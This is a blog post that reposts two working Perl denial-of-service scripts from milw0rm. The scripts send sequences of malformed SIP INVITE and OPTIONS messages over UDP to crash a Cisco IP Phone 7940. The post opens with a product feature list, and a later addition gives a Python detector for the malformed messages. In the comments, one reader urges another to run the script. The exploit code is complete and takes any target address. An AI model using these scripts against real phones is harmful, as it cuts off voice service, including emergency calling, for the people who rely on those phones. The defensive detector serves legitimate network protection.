My Opinion

Remote Denial of Service Exploit on the Cisco IP Phone 7940

The Cisco IP Phone is a voice-over-IP (VoIP) telephone from Cisco Systems, Inc. The advantages of the Cisco IP Phone 7940 include:

  • Directories: The Cisco IP Phone 7940G identifies incoming messages and categorizes them for users on the screen. This allows users to quickly and effectively return calls using direct dial-back capability.
  • Settings: The Settings feature key allows the user to adjust display contrast and select from a large number of unique ringer sounds and volume settings for all audio, such as ringer, handset, headset, and speaker. Network configuration preferences can also be set up. (Network configuration is usually set up by the system administrator.) Configuration can be either automatic or manual for Dynamic Host Configuration Protocol (DHCP), Trivial File Transfer Protocol (TFTP), CallManager, and backup CallManagers.
  • A huge advantage is the ability for no-hands-on moves and changes: just pick up the phone and move to the new location anywhere on your network.
  • Services: The Cisco 7940G allows users to quickly access diverse information such as weather, stocks, quote of the day, or any Web-based information using extensible markup language (XML) to provide a portal to an ever-growing world of features and information.
  • 24+ user-adjustable ring tones
  • A hearing-aid-compatible handset (meets American Disabilities Act [ADA] requirements) and HAC compliance for magnetic coupling to approved HAC hearing aids
  • G.711 and G.729a audio compression
  • H.323 compatible and Microsoft NetMeeting compatibility
  • IP address assignment: DHCP client or statically configured
  • Comfort noise generation and voice activity detection (VAD) programming on a system basis

A weakness was recently found in the device's internal system that can be abused with a remote denial-of-service exploit.

10 SIP messages:

#!/usr/bin/perl

use IO::Socket::INET;

die “Usage $0 <dst-address> <dst-port> <dst_username> <src-address>” unless ($ARGV[3]);

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>’udp’,

PeerAddr=>$ARGV[0]);

$msg = “INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=01;rport\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=01\r\nTo: <sip:$ARGV[2]\@invalidURL>\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 7532 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYL, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 215\r\n\r\nv=0\r\no=r`ot 7213 7244 IN IP4 192.168.1.101\r\ns=session\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=aIdio 8000 RTP/AVP 0 101\r\na=rtpmau:0 PCMU/8000\r\na=rtpmap:101 telephone-event/80 0\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n”;

$socket->send($msg);

sleep(8.2);

$msg = “OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=02\r\nCall-ID: 02\@$ARGV[3]\r\nCSeq: 79 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(1.5);

$msg = “OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=03\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 15853 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(3.3);

$msg = “INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=04\r\nCall-ID: 04\@$ARGV[3]\r\nCSeq: 36688 INVITE\r\nContent-Type: application/sdp\r\nAllow: INVITE, ACK, BTE, CANCEL, OPTIONS, PRACK, REFEY, NOTIFY, SUBSCRIBE, INFO\r\nSupported: 100rel\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 314\r\n\r\nv=0\r\no=0231555775 2006994253 1729335607 IN IP4 192.168.1.101\r\ns=-\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=audio 8002 RTP/AVP 98 97 8 0 3 101\r\na=rtpmap:98 speex/16000\r\na=rtpmap:97 peex/80-0\r\na=rtpmap:8 PCMA/8000\r\na=rtpmap:0 PCMU/8000\r\na=rtpma\x00:3 GSM/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-15\r\na=ptime:20\r\n”;

$socket->send($msg);

sleep(4);

$msg = “OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@invalidURL>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 21013 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(4);

$msg = “OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@invalidURL>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 18031 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(12);

$msg = “OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=07\r\nCall-ID: 07\@$ARGV[3]\r\nCSeq: 41664 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(3);

$msg = “INVITE sip:invaliduser\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=02;rport\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=08\r\nTo: <sip:7440-2\@$ARGV[0]>\r\nContact: <sip:tucu\@$ARGV[3]>\r\nCall-ID: 08\@$ARGV[3]\r\nCSeq: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 286\r\n\r\nv=0\r\no=root 7213 7217 IN IP4 192.168.1.4\r\ns=session\r\nc=IN IP4 192.168.1.4\r\nt=0 0\r\nm=audio 19024 RTP/AVP 0 3 8 97 101\r\na=rtpmap:0 PCMU/8000\r\na=rtpmap:3/GSM/8000\r\na=rtpmIp:8 PCMA/8000\r\na=rtpmap:97 spee8/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n”;

$socket->send($msg);

sleep(3);

$msg = “OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=09\r\nCall-ID: 09\@$ARGV[3]\r\nCSeq: 18883 OPTIONS\r\nAccept: application/sdp\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(3);

$msg = “OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=10\r\nCall-ID: 10\@$ARGV[3]\r\nCSeq: 6298 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

# milw0rm.com [2007-08-21]

3 SIP messages:

#!/usr/bin/perl
use IO::Socket::INET;

die “Usage $0

” unless ($ARGV[2]);$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>’udp’,

PeerAddr=>$ARGV[0]);

$msg = “INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n”;;

$socket->send($msg);

sleep(1);

$msg =”OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(1);

$msg =”OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02\r\nFrom: ;tag=02\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12 OPTIONS\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

# milw0rm.com [2007-08-21]
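
A defensive check for the irregularities visible in the messages above (misspelled method names in Allow, From/To headers with no URI, misspelled SDP attributes, a NUL byte), plus a Content-Length comparison against the body, as an added example that is not part of the original post or the milw0rm scripts. The function name, the SDP attribute allow-list and the sample datagrams are assumptions constructed for illustration.

```python
import re

# Method names from RFC 3261 and its common extensions.
KNOWN_METHODS = {"INVITE", "ACK", "BYE", "CANCEL", "OPTIONS", "REGISTER", "PRACK",
                 "REFER", "SUBSCRIBE", "NOTIFY", "INFO", "UPDATE", "MESSAGE", "PUBLISH"}
# Assumed allow-list of SDP attributes expected on the voice VLAN being monitored.
KNOWN_ATTRS = {"rtpmap", "fmtp", "ptime", "maxptime", "silenceSupp",
               "sendrecv", "sendonly", "recvonly", "inactive"}
URI = re.compile(r"\b(sips?|tel):\S")

def sip_anomalies(datagram: bytes) -> list:
    """Return the irregularities found in one SIP-over-UDP datagram."""
    found = ["nul-byte"] if b"\x00" in datagram else []
    head, _, body = datagram.partition(b"\r\n\r\n")
    headers = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:   # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # The declared body length must equal the bytes actually present.
    declared = headers.get("content-length", "")
    if not declared.isdigit() or int(declared) != len(body):
        found.append("content-length-mismatch")
    # From and To must each carry a URI.
    for name in ("from", "to"):
        if not URI.search(headers.get(name, "")):
            found.append(name + "-without-uri")
    # Every token in Allow must be a known method name.
    for method in headers.get("allow", "").split(","):
        if method.strip() and method.strip() not in KNOWN_METHODS:
            found.append("unknown-method:" + method.strip())
    # Every SDP line is "<letter>=<value>"; attributes must be on the allow-list.
    for line in body.decode("latin-1").split("\r\n"):
        if line and not re.match(r"[a-z]=\S", line):
            found.append("bad-sdp-line")
        elif line.startswith("a=") and line[2:].split(":")[0] not in KNOWN_ATTRS:
            found.append("unknown-sdp-attribute:" + line[2:].split(":")[0])
    return found

# Constructed samples (documentation addresses), not captured traffic.
SDP = b"v=0\r\nc=IN IP4 192.0.2.10\r\nm=audio 8000 RTP/AVP 0\r\na=rtpmau:0 PCMU/8000\r\n"
CLEAN = (b"OPTIONS sip:100@192.0.2.20 SIP/2.0\r\nVia: SIP/2.0/UDP 192.0.2.10;branch=z9hG4bK1\r\n"
         b"From: <sip:a@192.0.2.10>;tag=1\r\nTo: <sip:100@192.0.2.20>\r\n"
         b"Call-ID: 1@192.0.2.10\r\nCSeq: 1 OPTIONS\r\nContent-Length: 0\r\n\r\n")
ODD = (b"INVITE sip:100@192.0.2.20 SIP/2.0\r\nFrom: ;tag=1\r\nTo: \r\n"
       b"Allow: INVITE, ACK, BYL\r\nContent-Length: 215\r\n\r\n" + SDP)

for label, msg in (("clean", CLEAN), ("odd", ODD)):
    print(label, sip_anomalies(msg))
```

Any single finding is only a heuristic; several findings on one datagram sent to a phone's SIP port are a reasonable trigger for an alert or a drop rule at the voice VLAN boundary.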


Discussion

4 comments for “Remote Denial of Service Exploit on the Cisco IP Phone 7940”

  1. Is that a phone like Ceria??? You know, the wireless phone owned by PT HM Sampoerna

    Posted by bocah | October 10, 2007, 9:41 am
  2. Just go for it, kid! The script is already available. What are you waiting for :ngacir:

    Posted by brokencode | October 10, 2007, 9:43 am
  3. So what is that, man? I can't make sense of the English. I can do business only out of habit, not because I know English. You understand, in class I never got a 7 in English :P

    Posted by bocah | October 10, 2007, 9:46 am
  4. Sorry but what language are you speaking. I’ve understood nothing :kesel:

    Posted by reverse ip | March 28, 2008, 1:41 pm
